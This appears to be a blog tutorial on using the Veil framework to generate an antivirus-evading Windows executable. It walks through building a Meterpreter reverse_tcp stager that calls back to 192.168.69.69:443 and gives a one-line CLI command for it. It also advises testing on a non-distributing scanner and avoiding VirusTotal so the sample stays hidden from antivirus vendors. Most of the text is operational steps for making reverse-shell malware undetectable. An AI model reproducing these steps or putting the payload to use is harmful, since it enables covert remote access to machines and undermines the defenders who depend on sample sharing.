Bypass AV using Veil.
Veil is an excellent tool developed by Chris Truncer @ChrisTruncer, Mike Wright
@TheMightyShiv and The Grayhound @the_grayhound, designed specifically for Kali
Linux, with these goals:
• Bypass the AV solutions commonly deployed.
• Use the payloads from the Metasploit Framework, and pick up the new ones shipped in
future Metasploit releases.
• Make each generated payload as random as possible.
A few days ago Veil v2.0.4 was released. I want to talk about it and give some
examples of how to bypass several anti-virus products.
The main changes in this version are:
• x64 compatibility – the setup script has been updated so that Veil works on
both x86 and x64 systems.
• Update feature – Veil now has an update function, so it can be updated from
either the command line or the menu.
There are tutorials available at http://www.veil-evasion.com. The framework can be
downloaded from Chris's GitHub at https://github.com/ChrisTruncer/Veil/ or as a zip at
https://github.com/ChrisTruncer/Veil/archive/master.zip.
If you want to install Veil in your own environment you can use the commands
below (setup.sh lives in the setup/ directory; go back up afterwards to run Veil itself):
wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
./setup.sh
cd ..
If you are working on Kali Linux, the commands below are enough.
apt-get update
apt-get install veil
I had a bad experience with the second option, and I prefer to install Veil with the
first one, using the "setup.sh" script.
Veil's developers ask users not to submit any payload to www.virustotal.com, because
VirusTotal distributes samples to the anti-virus vendors. There is an alternative:
vscan.novirusthanks.org. That site scans suspicious files with multiple engines
and offers the option "Do not distribute the sample".
When Veil is freshly installed, just run it with the command below:
./Veil
Here Veil lists the available payloads with a short description of each. In this case I chose
python/b64VirtualAlloc by typing "18".
When the payload is loaded, type "generate". You can set some payload-specific options, but
in this post we are going to stick with the defaults.
Now select msfvenom by typing "1".
After that we need to enter some details:
• Enter metasploit payload: "windows/meterpreter/reverse_tcp"
• Enter value for 'LHOST', [tab] for local IP: "192.168.69.69"
• Enter value for 'LPORT': "443"
Then wait while msfvenom generates the shellcode.
Press Enter, and Veil asks for a name for the payload. In this case: "undetectable".
We are going to use PyInstaller, which bundles the Python payload into a standalone .exe. For this, type "1".
In the end, our executable is at "/root/Veil-master/output/compiled/".
Now that we have our executable, we are going to submit it to vscan.novirusthanks.org. Remember to check "Do not distribute the sample".
If you don't check this option, or you decide to submit the executable to
www.virustotal.com, your file will be shared with the anti-virus vendors and may end up being detected by some of them.
As you can see in the picture below, none of the anti-virus vendors detected our file as malicious: a detection rate of 0%! Bear in mind that a multi-engine scan like this only exercises the vendors' static, on-demand engines at the moment of scanning; whether the file is caught at run time, when the stager executes and connects back, is a separate question.
If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.
./Veil.py -l python -p b64VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.69.69 LPORT=443